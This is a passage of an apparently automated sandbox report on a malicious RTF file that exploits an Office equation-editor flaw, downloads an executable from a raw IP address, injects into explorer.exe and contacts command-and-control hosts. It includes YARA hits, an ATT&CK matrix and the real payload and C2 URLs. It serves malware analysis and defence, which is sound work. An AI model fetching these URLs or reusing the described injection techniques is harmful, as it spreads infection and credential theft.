          Source: explorer.exe, 00000007.00000002.2401194206.00000000006F0000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.2401088908.0000000000B50000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000002.2400913887.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000007.00000002.2401194206.00000000006F0000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.2401088908.0000000000B50000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection812Rootkit1Credential API Hooking1Security Software Discovery321Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading111LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol23SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection812LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 321301 Sample: fqwBU8MyzT.rtf Startdate: 20/11/2020 Architecture: WINDOWS Score: 100 41 www.opalthemovie.com 2->41 57 Malicious sample detected (through community Yara rule) 2->57 59 Antivirus / Scanner detection for submitted sample 2->59 61 Multi AV Scanner detection for dropped file 2->61 63 14 other signatures 2->63 11 EQNEDT32.EXE 12 2->11         started        16 WINWORD.EXE 336 20 2->16         started        18 EQNEDT32.EXE 2->18         started        signatures3 process4 dnsIp5 43 103.207.38.170, 49165, 80 VNPT-AS-VNVNPTCorpVN Viet Nam 11->43 37 C:\Users\user\AppData\Local\...\pp[1].exe, PE32 11->37 dropped 39 C:\Users\Public\vbc.exe, PE32 11->39 dropped 83 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->83 20 vbc.exe 11->20         started        file6 signatures7 process8 signatures9 65 Multi AV Scanner detection for dropped file 20->65 67 Machine Learning detection for dropped file 20->67 69 Writes to foreign memory regions 20->69 71 2 other signatures 20->71 23 RegSvcs.exe 20->23         started        26 RegSvcs.exe 20->26         started        process10 signatures11 73 Modifies the context of a thread in another process (thread injection) 23->73 75 Maps a DLL or memory area into another process 23->75 77 Sample uses process hollowing technique 23->77 79 Queues an APC in another process (thread injection) 23->79 28 explorer.exe 23->28 injected 81 Tries to detect virtualization through RDTSC time measurements 26->81 process12 dnsIp13 45 auctionpros.club 162.0.232.118, 49166, 80 NAMECHEAP-NETUS Canada 28->45 47 www.sgbanfang.com 146.148.194.209, 49167, 80 HENGTONG-IDC-LLCUS United States 28->47 49 www.auctionpros.club 28->49 85 System process connects to network (likely due to code injection or exploit) 28->85 32 wlanext.exe 28->32         started        signatures14 process15 signatures16 51 Modifies the context of a thread in another process (thread injection) 32->51 53 Maps a DLL or memory area into another process 32->53 55 Tries to detect virtualization through RDTSC time measurements 32->55 35 cmd.exe 32->35         started        process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          fqwBU8MyzT.rtf49%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
          fqwBU8MyzT.rtf100%AviraEXP/CVE-2017-11882.wizmq

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pp[1].exe100%Joe Sandbox ML
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pp[1].exe35%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          C:\Users\Public\vbc.exe35%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          6.2.RegSvcs.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://www.auctionpros.club/glt/?7nU0ar=hWCSv9Zuwtl8NadmrOYz8tuCeFQ4j+1tRbDGtAkGbLuNRVgUfRWqhIxsika1FnwxqADVww==&CdL=M2Mpiri0%Avira URL Cloudsafe
          http://www.sgbanfang.com/glt/?7nU0ar=Jg/IIDFoD2cxk/4co0w5JS6M3VwEeM8XBZAdxeVt8q7stueYx+spGuwe7uiPbRJ1VR6eAg==&CdL=M2Mpiri0%Avira URL Cloudsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://103.207.38.170/pp.exe0%Avira URL Cloudsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          auctionpros.club
          		162.0.232.118
          		truetrue
            		unknown
            www.sgbanfang.com
            		146.148.194.209
            		truetrue
              		unknown
              www.auctionpros.club
              		unknown
              		unknowntrue
                		unknown
                www.opalthemovie.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.auctionpros.club/glt/?7nU0ar=hWCSv9Zuwtl8NadmrOYz8tuCeFQ4j+1tRbDGtAkGbLuNRVgUfRWqhIxsika1FnwxqADVww==&CdL=M2Mpiritrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.sgbanfang.com/glt/?7nU0ar=Jg/IIDFoD2cxk/4co0w5JS6M3VwEeM8XBZAdxeVt8q7stueYx+spGuwe7uiPbRJ1VR6eAg==&CdL=M2Mpiritrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://103.207.38.170/pp.exetrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://search.chol.com/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                    		high
                    http://www.mercadolivre.com.br/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://search.ebay.de/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                      		high
                      http://www.mtv.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                        		high
                        http://www.rambler.ru/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                          		high
                          http://www.nifty.com/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                            		high
                            http://www.dailymail.co.uk/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www3.fnac.com/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                              		high
                              https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1explorer.exe, 00000007.00000000.2120612541.000000000842E000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.2113887423.00000000041AD000.00000004.00000001.sdmpfalse
                                		high
                                http://buscar.ya.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                  		high
                                  http://search.yahoo.com/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                    		high
                                    http://www.iis.fhg.de/audioPAexplorer.exe, 00000007.00000000.2114590389.0000000004B50000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.sogou.com/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                      		high
                                      http://asp.usatoday.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                        		high
                                        http://fr.search.yahoo.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                          		high
                                          http://rover.ebay.comexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                            		high
                                            http://in.search.yahoo.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                              		high
                                              http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                		high
                                                http://search.ebay.in/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  		high
                                                  http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://%s.comexplorer.exe, 00000007.00000000.2128384487.000000000A330000.00000008.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		low
                                                  http://msk.afisha.ru/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    		high
                                                    http://www.msn.com/?ocid=iehpsexplorer.exe, 00000007.00000000.2120612541.000000000842E000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://search.rediff.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          		high
                                                          http://www.windows.com/pctv.explorer.exe, 00000007.00000000.2112943695.0000000003C40000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.ya.com/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              		high
                                                              http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://it.search.dada.net/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://search.naver.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                		high
                                                                http://www.google.ru/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  		high
                                                                  http://search.hanafos.com/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.abril.com.br/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://search.daum.net/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    		high
                                                                    http://search.naver.com/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      		high
                                                                      http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.clarin.com/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        		high
                                                                        http://buscar.ozu.es/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://kr.search.yahoo.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          		high
                                                                          http://search.about.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            		high
                                                                            http://busca.igbusca.com.br/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              		high
                                                                              https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2explorer.exe, 00000007.00000000.2113858864.000000000419A000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.2112647152.00000000039F4000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://www.ask.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://www.priceminister.com/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://www.cjmall.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://search.centrum.cz/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://suche.t-online.de/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://www.google.it/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://search.auction.co.kr/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://www.ceneo.pl/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://www.amazon.de/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000007.00000000.2120970745.000000000861C000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://sads.myspace.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    http://google.pchome.com.tw/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.rambler.ru/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://uk.search.yahoo.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://espanol.search.yahoo.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.ozu.es/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://search.sify.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://openimage.interpark.com/interpark.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://search.ebay.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.gmarket.co.kr/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://search.nifty.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://searchresults.news.com.au/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://www.google.si/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://www.google.cz/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.soso.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://www.univision.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://search.ebay.it/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                		high
